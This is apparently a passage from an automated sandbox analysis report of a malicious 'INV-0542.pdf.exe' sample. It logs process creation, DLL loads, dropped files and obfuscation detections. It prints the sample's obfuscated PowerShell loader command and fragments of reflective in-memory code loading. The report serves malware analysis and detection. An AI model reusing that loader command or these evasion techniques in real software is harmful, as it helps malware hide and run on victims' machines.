          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: fontext.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: fms.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: INV-0542.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2417683631.0000000006F63000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2420884473.00000000081A2000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Forspildtes $Rhyparographer $Staalhjelms), (Ragedes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flyuheld = [AppDomain]::CurrentDomain.GetAssemblies()$g
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Moneylending)), $Defector).DefineDynamicModule($Ddmandsknaps, $false).DefineType($Feriekoloniernes, $juvelbelgnings, [System.Multicast
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_072B0FC4 push es; iretd 2_2_072B0FC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003948F1 push eax; ret 5_2_003948F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394927 push eax; ret 5_2_00394932
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0039891E pushad ; iretd 5_2_0039891F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394911 push eax; ret 5_2_00394912
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394917 push eax; ret 5_2_00394922
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394977 push eax; ret 5_2_00394982
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0039496D push eax; ret 5_2_00394972
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0039495A push eax; ret 5_2_00394962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394998 push eax; ret 5_2_003949A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00394987 push eax; ret 5_2_00394992
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: Possible double extension: pdf.exeStatic PE information: INV-0542.pdf.exe
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
